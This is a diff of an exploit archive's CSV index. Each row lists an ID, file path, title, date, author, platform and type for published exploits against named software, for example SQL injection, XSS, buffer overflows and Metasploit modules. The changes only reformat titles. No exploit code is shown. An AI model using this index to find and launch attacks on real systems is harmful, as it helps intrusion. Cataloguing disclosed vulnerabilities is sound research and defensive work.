+23453,7 @@ id,file,description,date,author,platform,type,port 26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - (.m3u) Denial of Service",2013-06-19,Chako,windows,dos,0 26323,platforms/windows/local/26323.cpp,"Microsoft Windows XP - Wireless Zero Configuration Service Information Disclosure",2005-10-04,"Laszlo Toth",windows,local,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 -26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0 +26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0 26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.php SQL Injection",2005-10-06,trueend5,php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 @@ -23474,7 +23469,7 @@ id,file,description,date,author,platform,type,port 26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - Main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 -26349,platforms/php/webapps/26349.txt,"Complete PHP Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 +26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - Search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0 26351,platforms/asp/webapps/26351.txt,"Comersus BackOffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 @@ -23501,7 +23496,7 @@ id,file,description,date,author,platform,type,port 26373,platforms/php/webapps/26373.txt,"MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 -26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0 +26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.php Remote Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -23545,7 +23540,7 @@ id,file,description,date,author,platform,type,port 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Local Privilege Escalation",2013-06-24,Metasploit,windows,local,0 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 -26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 +26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0 26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Include",2005-10-26,"Andreas Sandblad",php,webapps,0 @@ -23553,7 +23548,7 @@ id,file,description,date,author,platform,type,port 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injection",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - News.php SQL Injection",2005-10-26,svsecurity,php,webapps,0 -26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke HTML Injection",2005-10-26,bhfh01,php,webapps,0 +26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - forum.inc.php Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 @@ -23585,11 +23580,11 @@ id,file,description,date,author,platform,type,port 26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - Index.php SQL Injection",2005-11-02,Mousehack,php,webapps,0 26459,platforms/php/webapps/26459.txt,"phpWebThings 0.4.4 - Forum.php Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps,0 -26460,platforms/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow",2005-11-02,"Luigi Auriemma",windows,remote,0 +26460,platforms/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow",2005-11-02,"Luigi Auriemma",windows,remote,0 26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - preview_cgi.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - preview_static_cgi.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - colors.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 -26464,platforms/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service Directory Traversal",2005-11-03,"Dennis Rand",windows,remote,0 +26464,platforms/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service - Directory Traversal",2005-11-03,"Dennis Rand",windows,remote,0 26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - show_archives.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - show_news.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 @@ -23612,7 +23607,7 @@ id,file,description,date,author,platform,type,port 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 -26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 +26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",linux,dos,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - Tiki-view_forum_thread.php Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting",2005-11-09,"Moritz Naumann",windows,remote,0 @@ -23664,7 +23659,7 @@ id,file,description,date,author,platform,type,port 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - Shopadmin.ASP HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - Options.php and Viewforum.php SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - Popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 -26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 SVG Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 +26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - .SVG Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 26541,platforms/php/webapps/26541.txt,"SimplePoll - Results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 26543,platforms/php/webapps/26543.txt,"APBoard - Thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 @@ -23672,14 +23667,14 @@ id,file,description,date,author,platform,type,port 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - profile.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 -26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0 +26548,platforms/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",hardware,dos,0 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - Getdox.php Directory Traversal",2005-11-22,Shell,php,webapps,0 26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 26554,platforms/windows/local/26554.rb,"Windows - EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,Metasploit,windows,local,0 -26555,platforms/windows/dos/26555.txt,"Opera 12.15 vtable Corruption",2013-07-02,echo,windows,dos,0 +26555,platforms/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,windows,dos,0 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 - customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack-based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 @@ -23709,7 +23704,7 @@ id,file,description,date,author,platform,type,port 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module - record Parameter XSS",2005-11-24,"Christopher Kunz",php,webapps,0 -26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 RSS Aggregation Module Feed XSS",2005-11-24,"Christopher Kunz",php,webapps,0 +26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - RSS Aggregation Module Feed XSS",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - Index.php SQL Injection",2005-11-24,r0t,php,webapps,0 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - Forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 @@ -23892,13 +23887,13 @@ id,file,description,date,author,platform,type,port 26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos,0 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - Register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 -26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 Book.CFM Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 +26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - Book.CFM Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j - viewsource.jsp source Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j - Search URL NS-query-pat Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.EXE Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.ASP Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 -26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 Frameset.JSP Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 +26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 - Frameset.JSP Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 26779,platforms/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,windows,dos,0 26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - SPT-QuickSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - SPT-BrowseResources.php ParentId Parameter XSS",2005-12-12,Preddy,php,webapps,0 @@ -23925,7 +23920,7 @@ id,file,description,date,author,platform,type,port 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 26804,platforms/php/webapps/26804.txt,"WordPress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 -26805,platforms/windows/local/26805.rb,"Corel PDF Fusion Stack Buffer Overflow",2013-07-13,Metasploit,windows,local,0 +26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow",2013-07-13,Metasploit,windows,local,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - index.php language Parameter Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 @@ -23950,8 +23945,8 @@ id,file,description,date,author,platform,type,port 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - tracking.details.php trackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 - sales.view.php customerid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 +26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 +26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - index.php _SERVER[REMOTE_ADDR] Parameter XSS",2005-12-14,rgod,php,webapps,0 26837,platforms/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - index2.php option Parameter Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps,0 26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-commerce - index.php page Parameter XSS",2005-12-15,B3g0k,php,webapps,0 @@ -23971,9 +23966,9 @@ id,file,description,date,author,platform,type,port 26852,platforms/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26853,platforms/php/webapps/26853.txt,"ezDatabase 2.1.2 - index.php p Parameter Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 26854,platforms/php/webapps/26854.txt,"ezDatabase 2.1.2 - index.php db_id Parameter SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 -26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 +26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 -26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 +26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 - toc.pl board Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 @@ -24055,7 +24050,7 @@ id,file,description,date,author,platform,type,port 26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter XSS",2005-12-21,r0t,asp,webapps,0 26937,platforms/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps,0 26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 - Search Module Multiple Parameter XSS",2005-12-21,r0t3d3Vil,php,webapps,0 -26939,platforms/php/webapps/26939.txt,"Scoop 1.1 RC1 Missing Story Error XSS",2005-12-21,r0t3d3Vil,php,webapps,0 +26939,platforms/php/webapps/26939.txt,"Scoop 1.1 RC1 - Missing Story Error XSS",2005-12-21,r0t3d3Vil,php,webapps,0 26940,platforms/asp/webapps/26940.txt,"Commercial Interactive Media SCOOP! 2.3 - articleSearch.asp XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26941,platforms/asp/webapps/26941.txt,"Commercial Interactive Media SCOOP! 2.3 - lostPassword.asp Multiple Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26942,platforms/asp/webapps/26942.txt,"Commercial Interactive Media SCOOP! 2.3 - account_login.asp Multiple Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 @@ -24111,16 +24106,16 @@ id,file,description,date,author,platform,type,port 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 -26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 -26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 -26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 +26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 +26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 +26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 - GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum - Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 26999,platforms/php/webapps/26999.txt,"PHPBook 1.x - Mail Field PHP Code Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27000,platforms/php/webapps/27000.txt,"VEGO Web Forum 1.x - Theme_ID SQL Injection",2005-12-28,"Aliaksandr Hartsuyeu",php,webapps,0 27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 Readold Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - Readold Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - Member.php Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps,0 @@ -24134,11 +24129,11 @@ id,file,description,date,author,platform,type,port 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 -27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - modules.php Multiple Parameter XSS",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 -27019,platforms/php/webapps/27019.txt,"VBulletin 3.5.2 Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 +27019,platforms/php/webapps/27019.txt,"VBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injection",2006-01-03,r0t,php,webapps,0 @@ -24160,7 +24155,7 @@ id,file,description,date,author,platform,type,port 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps,0 27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 - Index.php Cross-Site Scripting",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 -27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 Information Disclosure",2006-03-04,Retard,php,webapps,0 +27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - index.php page Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - Bigshow.php Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 @@ -24168,7 +24163,7 @@ id,file,description,date,author,platform,type,port 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 27044,platforms/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 -27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 +27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) - bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 